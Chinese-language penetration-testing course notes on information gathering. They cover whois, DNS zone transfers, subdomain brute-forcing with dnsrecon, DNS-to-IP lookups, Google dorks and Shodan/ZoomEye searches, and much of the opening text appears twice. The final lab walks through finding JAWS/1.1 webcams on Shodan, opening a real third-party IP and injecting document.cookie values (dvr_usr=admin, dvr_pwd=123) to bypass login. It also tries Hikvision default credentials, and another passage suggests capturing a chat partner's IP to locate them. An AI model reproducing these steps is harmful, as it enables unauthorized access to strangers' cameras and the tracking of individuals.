目录
信息收集
为什么学习这节课程
在划定了测试范围之后,就需要进入信息收集阶段。在这个阶段,渗透人员需要使用各种公共资源尽可能地获取测试目标的相关信息。他们从互联网上搜集信息的渠道主要有:
| @ |
论坛 |
| @ |
公告板 |
| @ |
新闻组 |
| @ |
媒体文章 |
| @ |
博客 |
| @ |
社交网络 |
| @ |
其他商业或非商业性网站 |
| @ |
GitHub |
….
此外,他们也可以借助各种搜索引擎中获取相关数据,如谷歌、雅虎、MSN必应、百度等。收集信息主要包括DNS 服务器、路由关系、whois 数据库、电子邮件地址、电话号码、个人信息以及用户账户。收集信息越多,渗透测试成功的概率越高
本课程以[testfire.net]为目标,testfire.net 是IBM 公司为了演示旗下比较有名的Web 漏洞扫描器AppScan 的强大功能所搭建的模拟银行网站,所以上面会有很多常见的Web 安全漏洞
类似的测试网站
[http://vulnweb.com/],为了演示AVWS
可以拿上面两个网站去练手
DNS 信息
在收集DNS 信息的时候,主要关注域名或注册商,管理员联系方式,电话和邮箱,子域名等信息。
-
whois查询
whois是一个集成在kali 虚拟机中的小工具
whois工具可以用来查询域名注册信息。
[whois domain]
[whois testfire.net]
也可以通过站长之家进行whois 查询[http://whois.chinaz.com]
除了whois 查询以外,还可以进行反查。
| @ |
邮箱反查 |
| @ |
注册人反查 |
| @ |
电话反查 |
子域名查询
可以查询子域名的网站[https://searchdns.netcraft.com/],这种方法查询大型网站比较有优势
| @方法1 |
Netcraft.com |
| @方法2 |
证书(点一下那个小锁--更多信息) |
-
域传送漏洞
DNS区域传送指的是一台备用服务器使用来自主服务器的数据刷新自己的域数据库。这为运行中的DNS 服务提供了一定的冗余度,其目的是为了防止主域名服务器因为意外故障变得不可用时影响到整个域名的解析。一般来说,DNS区域传送操作只在网络中真的有备用域名服务器的时候才有必要用到,但是许多DNS服务器却被错误的配置成只要有client 发出请求,就会像对方提供一个zone 的数据库的详细信息,所以说允许不受信任的英特网用户执行DNS区域传送操作是后果最为严重的错误配置之一。
可以使用dig 工具来检测域传送漏洞,命令如下
[dig axfr @dns.example.com example.com]
dig axfr @your-ip www.vulhub.org
dig axfr @172.16.132.1 www.vulhub.org
kali中有dig工具
通过域传送漏洞,可以得到子域名信息,和网站的子域名对应的ip地址
实验:子域名爆破
- 工具:子域名挖掘机
- dnsrecon
[dnsrecon -d vulnweb.co -D /root/dic/dns.dic -t brt]
现在的子域名爆破越来越不靠谱,但是还是要了解一下
子域名挖掘机的字典是dic.txt(程序写死了的)
准备一个字典写上所有的域名(4个字母左右别超过10个)。字典中的每个单词,依次去尝试
工具不重要,重要的是字典
工具:
1、layer(子域名挖掘机)
2、dnsrecon(kali自带)
dnsrecon -d vulnweb.com -D /root/tmp/dic/dns.dic -t brt
-d 指定域名
-D 指定字典 (给绝对路径)
-t brt 指定枚举形式 爆破(指定模式)
DNS2IP
通过DNS 解析找到IP地址
-
ping
非权威解答
ping testfire.net
65.61.137.117
ping baidu.com
39.156.69.79
ping www.baidu.com
36.152.44.95
-
nslookup
testfire.net 65.61.137.117
------------
> testfire.net
Server: 192.168.1.2
Address: 192.168.1.2#53
Non-authoritative answer:
Name: testfire.net
Address: 65.61.137.117
------
------------
> baidu.com
Server: 192.168.1.2
Address: 192.168.1.2#53
Non-authoritative answer:
Name: baidu.com
Address: 39.156.69.79
Name: baidu.com
Address: 220.181.38.148
------
信息收集
为什么学习这节课程
在划定了测试范围之后,就需要进入信息收集阶段。在这个阶段,渗透人员需要使用各种公共资源尽可能地获取测试目标的相关信息。他们从互联网上搜集信息的渠道主要有:
| @ |
论坛 |
| @ |
公告板 |
| @ |
新闻组 |
| @ |
媒体文章 |
| @ |
博客 |
| @ |
社交网络 |
| @ |
其他商业或非商业性网站 |
| @ |
GitHub |
….
此外,他们也可以借助各种搜索引擎中获取相关数据,如谷歌、雅虎、MSN必应、百度等。收集信息主要包括DNS 服务器、路由关系、whois 数据库、电子邮件地址、电话号码、个人信息以及用户账户。收集信息越多,渗透测试成功的概率越高
本课程以[testfire.net]为目标,testfire.net 是IBM 公司为了演示旗下比较有名的Web 漏洞扫描器AppScan 的强大功能所搭建的模拟银行网站,所以上面会有很多常见的Web 安全漏洞
类似的测试网站
DNS 信息
在收集DNS 信息的时候,主要关注域名或注册商,管理员联系方式,电话和邮箱,子域名等信息。
whois是一个集成在kali 虚拟机中的小工具
whois工具可以用来查询域名注册信息。
[whois domain]
[whois testfire.net]
也可以通过站长之家进行whois 查询[http://whois.chinaz.com]
除了whois 查询以外,还可以进行反查。
| @ |
邮箱反查 |
| @ |
注册人反查 |
| @ |
电话反查 |
可以查询子域名的网站[https://searchdns.netcraft.com/],这种方法查询大型网站比较有优势
| @ |
Netcraft.com |
| @ |
证书 |
DNS区域传送指的是一台备用服务器使用来自主服务器的数据刷新自己的域数据库。这为运行中的DNS 服务提供了一定的冗余度,其目的是为了防止主域名服务器因为意外故障变得不可用时影响到整个域名的解析。一般来说,DNS区域传送操作只在网络中真的有备用域名服务器的时候才有必要用到,但是许多DNS服务器却被错误的配置成只要有client 发出请求,就会像对方提供一个zone 的数据库的详细信息,所以说允许不受信任的英特网用户执行DNS区域传送操作是后果最为严重的错误配置之一。
可以使用dig 工具来检测域传送漏洞,命令如下
[dig axfr @dns.example.com example.com]
通过域传送漏洞
子域名信息
子域名对应的IP地址
实验:子域名爆破
- 工具:子域名挖掘机
- dnsrecon
[dnsrecon -d vulnweb.co -D /root/dic/dns.dic -t brt]
准备一个字典写上所有的域名(4个字母左右别超过10个)。字典中的每个单词,依次去尝试
工具不重要,重要的是字典
工具:
1、layer(子域名挖掘机)
2、dnsrecon
dnsrecon -d vulnweb.com -D /root/tmp/dic/dns.dic -t brt
-d 指定域名 -D 指定字典 -t 指定模式
DNS2IP
通过DNS 解析找到IP地址
非权威解答
ping testfire.net
65.61.137.117
ping baidu.com
39.156.69.79
ping www.baidu.com
39.156.66.18
testfire.net 65.61.137.117
------------
> testfire.net
Server: 192.168.1.2
Address: 192.168.1.2#53
Non-authoritative answer:
Name: testfire.net
Address: 65.61.137.117
------
------------
> baidu.com
Server: 192.168.1.2
Address: 192.168.1.2#53
Non-authoritative answer:
Name: baidu.com
Address: 39.156.69.79
Name: baidu.com
Address: 220.181.38.148
------
------------
Server: 192.168.1.2
Address: 192.168.1.2#53
Non-authoritative answer:
www.baidu.com canonical name = www.a.shifen.com.
Name: www.a.shifen.com
Address: 39.156.66.14
Name: www.a.shifen.com
Address: 39.156.66.18
--------
-
dig工具
dig testfire.net
dig @8.8.8.8 testfire.net 指定dns服务器
dig +trace testfire.net 获取域名的详细解析过程
-
dnsenum(推荐)
dnsenum testfire.net
此处推荐dnsenum,此工具在解析域名的时候,会自动检测域传送漏洞
-
利用站长工具
路由追踪
-
CDN 加速问题
CDN 是内容分发网络
本意是进行节点缓存,是网站访问速度加快。一般情况下是没办法得到目标的网站的真实IP 的。关于SDN 加速可以作为一个课题。
参考资料如下:(获取CDN)
IP 查询
http://ip.chinaz.com/65.61.137.117
-
同IP 网站查询(重要)
同一个IP 上的网站
1.1.1.1
A B
A和B就是旁站的关系(同一个服务器上的两个网站)“曲线救国”
1.1.1.* C 段查询
65.61.137.117
-
查询IP 地址经纬度
https://www.maxmind.com/zh/home
得到IP地址的大致经纬度(40.9476, -73.8624)
这个ip地址对查公司来讲不是特别准,查个人比较准
你聊QQ的时候把它IP地址抓到,就知道地理位置
-
通过GPS 查询物理位置
http://www.gpsspg.com/maps.htm
利用搜索引擎搜集信息
Google 机器人,爬行全世界所有网站的内容。Google hacker 就是利用搜索引擎语法,获取有关网站的信息。
| site |
指定网站 |
| "" |
包含关键字 |
| inurl |
在url 中出现的关键字 |
| filetype |
指定文件类型(不太好用) |
-
探索网站目录结构
"parent directory" site:testfire.net #搜索testfire.net 网站的parent directory关键字
site:testfire.net inurl:login
filetype pdf
-
搜索phpinfo()
intext:"PHP Version" exit:php intest:"disabled" intext:"BuildDate" intext:"Syatem" intext:"allow_url_fopen"
intitle:"php中文网 探针2014"
-
钟馗之眼
ZoomEye 支持公网设备指纹检索和Web 指纹检索。网站指纹包括应用名、版本、前端框架、后端框架、服务端语言、服务器操作系统、网站容器、内容管理系统和数据等。
-
搜索iis6.0 组件
app:"Microsoft IIS httpd" ver:"6.0"
port:3389 OS:windows
shodan(推荐)
JAWS/1.1(摄像头)
网站信息收集
收集指纹信息
Web 服务器信息
netcraft.net
装插件
火狐插件
Netcraft Extension
Wappalyzer
Hikvision
实验:shodan(上面的截图是步骤)
搜索JAWS/1.1
点击第一个
在地址栏输入IP:87.10.224.71
发现登陆不了
F12打开控制台,把下面代码复制进去
document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";
执行后,你在url后加上/view2.html,发现进去了
装一下flash
直接在本地访问一下比较好,点击here
有的能访问有的不能
试一下Hikvision
admin 12345
